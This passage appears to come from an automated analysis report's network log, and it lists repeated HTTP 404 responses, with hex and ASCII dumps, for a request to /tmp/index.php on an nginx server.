request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
